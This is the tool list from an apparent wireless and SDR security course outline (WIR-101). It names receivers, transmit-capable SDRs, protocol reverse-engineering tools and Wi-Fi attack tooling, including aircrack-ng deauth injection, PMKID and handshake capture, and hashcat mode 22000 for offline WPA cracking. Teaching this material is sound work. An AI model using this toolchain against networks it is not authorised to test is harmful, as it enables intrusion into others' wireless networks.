- GNU Radio Companion (GRC) -- Flowgraph-based DSP/SDR platform; first met Week 9. The in-browser Pyodide subset is in engineering; full GRC is an advanced-track external install.
- GQRX -- Linux/macOS spectrum analyzer and waterfall display; receive-only SDR receiver UI. First met Week 1.
- SDR# (Windows) / SDR++ (cross-platform) -- SDR receiver UIs; useful alongside GQRX for quick spectrum checks.
- RTL-SDR Blog V4 + osmocom rtl-sdr drivers (librtlsdr; the V4 needs the RTL-SDR Blog fork for full support) -- Receive-only SDR; the sub-GHz survey workhorse.
- HackRF One + hackrf_transfer + Great Scott Gadgets GRC blocks -- Transmit-capable SDR; program-supplied. Michael Ossmann's "SDR with HackRF" YouTube series is the companion reading.
- ANTSDR E200 -- Advanced lab SDR platform; carries forward into RF-201/RF-301.
- Inspectrum -- Offline IQ file visualization; protocol time-frequency analysis; first met Week 9, deepened in RF-201.
- Universal Radio Hacker (URH) -- Wireless-protocol RE suite; encoding detection; simulation of cryptographic handshakes; 327-protocol auto-identification in URH-NG fork. First met Week 9.
- Alfa AWUS036ACH -- Monitor-mode-capable 802.11ac USB NIC; the practitioner-staple for 802.11 capture.
- aircrack-ng suite (airmon-ng / airodump-ng / aireplay-ng / aircrack-ng) -- 802.11 monitor mode, frame capture, deauth injection (authorized only), offline cracking.
- hcxdumptool + hcxtools -- PMKID and handshake capture toolkit; modern replacement for the old besside-ng clientless capture workflow.
- hashcat (mode -m 22000, WPA-PBKDF2-PMKID+EAPOL) -- GPU-accelerated offline passphrase cracking; the older -m 2500 (EAPOL) and -m 16800 (PMKID) modes are deprecated, and -m 22000 handles both handshake and PMKID records in one format.
- Kismet -- Passive 802.11 wireless detector + sniffer + IDS; site-survey staple. Handles Bluetooth + sub-GHz with appropriate hardware.
- Wireshark with 802.11 / RF dissectors -- Frame-level 802.11 analysis; extends the NET-101 Wireshark introduction for wireless-specific dissection.
- nRF52840 dongle + btmon + gatttool -- Bluetooth/BLE investigation toolset; canonical first-introduce of BLE tooling. gatttool is deprecated in current BlueZ releases; bluetoothctl's gatt submenu is the supported replacement.
WIR-101-OUTLINE.md v0.1. Week files: week-1.md through week-11.md. Capstone: CAPSTONE.md. Setup: SETUP.md. Instructor: INSTRUCTOR-GUIDE.md.